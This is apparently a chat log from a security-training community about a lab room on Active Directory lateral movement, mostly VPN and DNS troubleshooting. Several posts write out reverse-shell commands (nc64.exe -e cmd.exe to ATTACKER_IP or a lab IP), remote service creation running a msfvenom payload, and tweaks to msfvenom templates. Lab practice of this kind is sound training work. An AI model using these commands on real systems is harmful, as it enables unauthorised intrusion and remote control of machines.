I believe this is explained in the intro of the room, but using the Leave Room options has also worked for me to get it working from scratch
systemctl restart dnsmasq has also helped me in the situation, I've also been able to visit the different sites (to get credentials) even if nslookup wasnt responding properly

hello. i cannot ping the thmiis from the jump machine. but i could use smb to send the reverseshell there. strange. when i try runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" from the jump of course my attacker machine never sees anything . ok i understand ping not allowed (i get it now) but sadly the attacker machine never gets anything 🙁 i will do it again later but i wonder if someone had the issue and maybe i have done something stupid which explains. but i dont understand 😄 have a nice day

anybody else getting a restart pause loop every 2s with a sigint soft, connection-reset restart?

this vpn and this room is janky

Does anyone having same problem as me?

c:\Users\t1_leonard.summers\Desktop>whoami
whoami
nt authority\system

c:\Users\t1_leonard.summers\Desktop>FLAG.exe
FLAG.exe
Sorry! You are still missing something. No flag for you yet. (6)

Doing ExploitingAD now, and the VPN is not connected. Firefox, using AttackBox. I was able to do both Breaching AD and Enumerating AD earlier today without issue, now it's not connecting. Is there some sort of limit per day? Second day where working on this hits a stopping point from the VPN not functioning properly

@odd sequoia Please slow down. Further spam will result in a short timeout.

I cannot connect to the vpn is there a problem?

Anyone got any ideas why my service doesn't start at the end of task 3? I've tried several times now on different days using different filenames for the payload and different service names but it just doesn't want to start. I have tried copying and pasting the command line for creating the payload in msfvenom and typing it in manually just to make sure that's right and I can see the .exe in %windir%

⁨```
C:\Windows\system32>sc.exe \thmiis.za.tryhackme.com create THMservice-4545 binPath= "%windir%\candyservice.exe" start= auto
sc.exe \thmiis.za.tryhackme.com create THMservice-4545 binPath= "%windir%\candyservice.exe" start= auto
[SC] CreateService SUCCESS

C:\Windows\system32>sc.exe \thmiis.za.tryhackme.com start THMservice-4545
sc.exe \thmiis.za.tryhackme.com start THMservice-4545
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Ah, I managed to get it to start by creating a 64-bit payload instead.

i can't connect to the vpn.. somebody any idea what i can try?

@thick monolith try rebuilding any payloads as x64. That worked for me to start the service and get the connection but then it still wouldn't let me run the flag.exe 😕

its the VPN file of the Network

Hi @thick monolith , thank you for the Linux OpenVPN guide. I am currently working on Windows and I am unable to establish a VPN connection — the connection times out. Do you have any advice or Windows-specific considerations I should be aware of?

Thanks for the video. Strange that he gets the flag as local system when I'm connected as the same account via Metasploit via the malicious service. I can't see anything I did differently other than using a 64-bit payload. Maybe I'll just give it another try later in the week. Hope you manage to get somewhere with it.

Gave +1 Rep to @thick monolith (current: #1051 - 6)

i got it now i had to regenerate the VPN a few times but now it works 🙂

Gave +1 Rep to @thick monolith (current: #944 - 7)

I'm still stumped on the very end of Task 3. I can get all the way there following the guide (although I have to generate a 64-bit payload to get it to run) but I get the service running as Local System to connect back to my msfconsole, I run flag.exe and just always get "Sorry! You are still missing something. No flag for you yet. (7)"

Any advice?

Yes! Did you ever resolve it?

Hi i have an issue where i want to connect the vpn lateral movement and pivoting room but get this failed connection refused and restart. even after redownloading a new OVPN file, it still persists. is there any other step did i miss?

for this issue, i had resolved it thank you

have you solved the problem i too get the same problem now i also needed 64 bit payload to get it to run and after all the shit this room made me debug through and now its saying "Sorry! You are still missing something. No flag for you yet. (7)"

No, there didn't seem to be any support and I couldn't figure it out on my own (not that I should have to because it's not a CTF) Such a shame when this is supposed to be an educational platform and I pay money for it. Very disappointing. I wish you luck though. If you figure it out, please let me know. 👍🏻

After starting the malicious service, it runs under rundll32.exe which is acc to chatgpt is checked by flag.txt and flag.txt expects the structure
service.exe
__ malsvc.exe
__ cmd.exe
But the actual structure is
service.exe
__ malsvc.exe
__ rundll32.exe
__ cmd.exe
So we fail the check and get that error I don't know if this this is the actual reason, also walkthroughs run the same commands but don't get the error, why is that. I think because they are pretty old when the environment was different from now and with that previous environment in mind that flag could've been created, now the environment changed the flag is failing, it is definitely not our fault. I wonder if it is fault of msfvenom payload generation.

i solved the structure problem by modifying msfvenom exe-service default template removing the call of rundll32.exe and using that modified template as a custom template using option -x in msfvenom itself and that made my service run directly under service.exe removing the middleman rundll32.exe which was spawned by msfconsole default template. now i got another problem to solve i don't what i missed "Sorry! You are still missing something. No flag for you yet. (6)" from 7 to 6 the numbers are decreasing.

did you solve the problem

This room is 100% bugged on Task 3.

own machine nor the attack box works

my own machine can't resolve the name of the account in the runas command (for some reason ?) and my attackbox simply don't want to accept the revershell at all with nc

I followed the room step by step and nothing works

tried 3 different walkthough ? nothing

tried looking in here for hours and everyone is complaining about the DNS having issue while in other networks i had no issues with that

Am I missing something ?

You solved your issue? If not just move on. I wasted hours debugging with no good result get the flag from walkthroughs and you'll be fine

Nope didn’t solved it so I got the flag from a walkthrough since I had the whole process understood but not working and went on my way

this room is even more bugged now with the new attackbox

anyone having trouble with DNS on mac os? tried to go Settings > Wi-Fi > my network > DNS, and appended at the end the IP of the domain controller. Yet, won't let me get the credentials. Tried also adding nameserver $THMDC_IP to /etc/resolver/za.tryhackme.com. Nothing again. Is it really bugged out?

Hey all,

I'm trying to complete this room, but it seems since a couple of days the network doesn't start at all for me anymore. Just stays in the loading state cycling through the different messages forever (I left it open for hours). Tried different days, different browsers, but didn't help. Also cannot click on Request Reset or anything since it's all blocked in the loading state.

Is anybody else seeing this?

It is the msfvenom payload, yes, but it's not rundll that's the problem. Finding another means to thread hijack solves this issue.

It's been five days trying to do the complex exploit in task 7 and it doesn't seem to be responsive, box may need to be reset

It was the wrong account:
za\t1_leonard.summers@THMJMP2 C:\Users\t1_leonard.summers>runas /netonly /user:za.tryhackme.com\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.150.74.11 7676"

@feral fern
Nope, I was wrong too 🙂
The impersonation of t1_leonhard.summers is only for remote, but nc64.exe is local. So, whoami don't helps here. But you can test your evelate privs in the new reverse shell, if you try with bradley.cook to access to a resource, he hasn't access to: dir \\thmiis.za.tryhackme.com\admin$ you can see the share, that only andmins can see

Is this room broken? Half the time the given credentials don't work, and even when they do, I can't get to the flag. I've been spending full days on a task that's supposed to take 45 minutes

I try to complete these things "with honor" but I'm tempted to just plug in the flags from walkthroughs. I'm 96% of the way through the Pentest+ course and this room is the main thing keeping me from 100%

I need some help. I am stuck on the falicia dean part and I am about to swear at someone

first

but needing help in the task 3 for the first rev shell with runas

it doesn't really give anything other than

That IP you used looked a bit wrong. Should it not be 10.50.61.1?

oh ffs

Can you run ifconfig? Just note I'm guessing here

yeah, it's me getting them mixed up

got it

mixed the 2 ips together

so the fix of the ip helped 😄

Ah okay perfect! It was a shot in the dark but glad it worked out! Yeah so for reverse shells it should be that VPN IP which translates to the IP corresponding to the Gateway. For bind shells it will be the actual IP of the host which will correspond to the Destination of the route -n command

I need to move the note on how to select the right IP for revshells. Will do in a minute 😀

also for some reason we get access denied now

even though 5 minutes ago I was able to do it

What users are you running as on that terminal?

t1_leonard.summers

Mmm, t1 users should have full permissions on servers. Can you run dir \\thmiis.za.tryhackme.com\c$ and see if that works?

The network path was not found

Just check I made a typo, should be IIS, not ISS

"The user name or password is incorrect"

Ahh, so yeah creds no work

You sure you typed that password correctly for the runas command?

thought it would give error on the run as

but oh well

fixed

lol

You can always verify creds by running dir \\za.tryhackme.com\sysvol

it doesn't go well for me today

That's is the magic of the runas command if you run it with /netonly flag. It was discussed in the Enumerating AD (Task 2) room 🙂 You can specify whatever creds you want, it won't test them against the domain. So great when it works, but yeah, you need to do a quick check on the creds with something like sysvol.

🥳

@shadow linden where is PsExec64.exe laying on the jmp2 since I can't find it in C:\windows\system32

It should be on c:\tools

thanks for the nice room @shadow linden

Gave +1 Rep to @shadow linden

though a little irritating you have to restart your dns for every task, it happened for me 😄

That's weird... Are you using the attackbox?

Yeah

After every task it couldn't resolve the host names

I'll take a look at that. Thx for the feedback 😀

You're welcome, also give a pointer that the psexec tool is in c:\tools can help some people

I wanna say something
Last week I was doing your brand new windows privilege escalation room, which was revamped I guess,
It was so beautifully written, coordinated, I was happy reading them all and going through it, following up,
Passing by each task I felt accomplished and learnt a lot, it looked like straight out of the notes (If I would had to make it) I'm in love with it absolutely. I'm gonna do every other room by you soon. Especially the new one (lateral movement network).

Much love

I can't seem to download the ovpn config file for this network, I've tried leaving and rejoining the room and waited for a while but the the access page just gives a 404 not found error whenever I try to download it, any help would be appreciated.

Probably a good idea to give them the subnet you're on.

They seem to ask for it every time I think anyone has a 404 error.

the network is on 10.200.77.x , it just reset but no difference

Yeah, I'm on the same network and I can't download it either, 10.200.77.101

Forwarded on ^

Will let you know when I hear something

should be fixed @feral granite @toxic harness

yeh, it works + @frail ore

Gave +1 Rep to @frail ore

💪 🎉

niiiiice

Have issue with accessing machines on the network, seems like vpn connection is good. Network is 10.200.78.X

what issue are you getting, can you ping 10.200.78.101?

Nop, that's the problem

The whole network is out of access

can you send a screenshot of your ip a

and what the VPN is saying

Connectivity to the router is fine, let's just wait for the staff, no hurry it's Sunday 🥳

wait, have you joined multiple networks lately?

as in the latest windows networks

Maybe, i still have access to the "Enumerating-AD" network

I have experienced problems with routing cause of joining multiple networks, try leaving the enumerating-ad

and then download a new vpn

Still doesn't work, thank you Bella for the effort

Thanks Ben.

Gave +1 Rep to @frail ore

I have lateral movement vpn active. Also green indicator at Access => Networks page but IP address of AD server can't be reached. Any suggestions?

What's your ip range?

10.50.78.3/24

And the servers ips?

10.200.79.0/24 .101 is THMDC

hmm @shadow linden

If you just started the network, give it a min or two. The DC is always the last to start

Thanks KillSwitch! Means a lot to me. Glad you liked it 🥳

Gave +1 Rep to @high ridge

10.50.78.1 still gives destination host unreachable for 10.200.79.101 AD server but also the .201 and .249

I think something wrong, network is up 35 minutes and still server of 10.200.79.0/24 accessible via 10.50.78.1 gateway.

Will give it another try some other time.

Let me check that.

I still can't download the VPN, no rush though. A Regen fixed it.

Can someone please reset .71 network!

It's borked

is .71 the subnet number?

Yes

Just double-checking (: I've passed it on

I appreciate that, I had a 2nd confirmation that it isn't me.

I had to move the lines to double check the number now 😂

~~ I can't reach the servers. ~~ Never mind, the network wasn't started 😂

I'm quitting while I'm ahead.

Me too I seem not to be able to reach anything on the 10.200.80.0/24 net (network is started :))

What's your /etc/resolv.conf ?

I'm using attackbox

nameserver 127.0.0.53
options edns0
search eu-west-1.compute.internal

change the nameserver to whatever your subnet is.

so it it's like mine, it will be 10.200.77.101

It should fix it.

root@kali:~/tryhackme/LateralWin# cat /etc/resolv.conf
# Generated by NetworkManager
search localdomain
nameserver 10.200.71.101
root@kali:~/tryhackme/LateralWin# cat /etc/systemd/resolved.conf
#  This file is part of systemd.
#
#  systemd is free software; you can redistribute it and/or modify it under the
#  terms of the GNU Lesser General Public License as published by the Free
#  Software Foundation; either version 2.1 of the License, or (at your option)
#  any later version.
#
# Entries in this file show the compile time defaults. Local configuration
# should be created by either modifying this file, or by creating "drop-ins" in
# the resolved.conf.d/ subdirectory. The latter is generally recommended.
# Defaults can be restored by simply deleting this file and all drop-ins.
#
# Use 'systemd-analyze cat-config systemd/resolved.conf' to display the full config.
#
# See resolved.conf(5) for details.

[Resolve]
# Some examples of DNS servers which may be used for DNS= and FallbackDNS=:
# Cloudflare: 1.1.1.1#cloudflare-dns.com 1.0.0.1#cloudflare-dns.com 2606:4700:4700::1111#cloudflare-dns.com 2606:4700:4700::1001#cloudflare-dns.com
# Google:     8.8.8.8#dns.google 8.8.4.4#dns.google 2001:4860:4860::8888#dns.google 2001:4860:4860::8844#dns.google
# Quad9:      9.9.9.9#dns.quad9.net 149.112.112.112#dns.quad9.net 2620:fe::fe#dns.quad9.net 2620:fe::9#dns.quad9.net
DNS=10.200.71.101
#FallbackDNS=
#Domains=
#DNSSEC=no
#DNSOverTLS=no
#MulticastDNS=yes
#LLMNR=yes
#Cache=yes
#CacheFromLocalhost=no
#DNSStubListener=yes
#DNSStubListenerExtra=
#ReadEtcHosts=yes
#ResolveUnicastSingleLabel=no

already tried without success

dig thmdc.za.tryhackme.com @10.200.80.101 times out too

Please just run nmap -p 22,3389 10.200.<YourSubnet>.249 -Pn - If these ports are not open, something wrong with network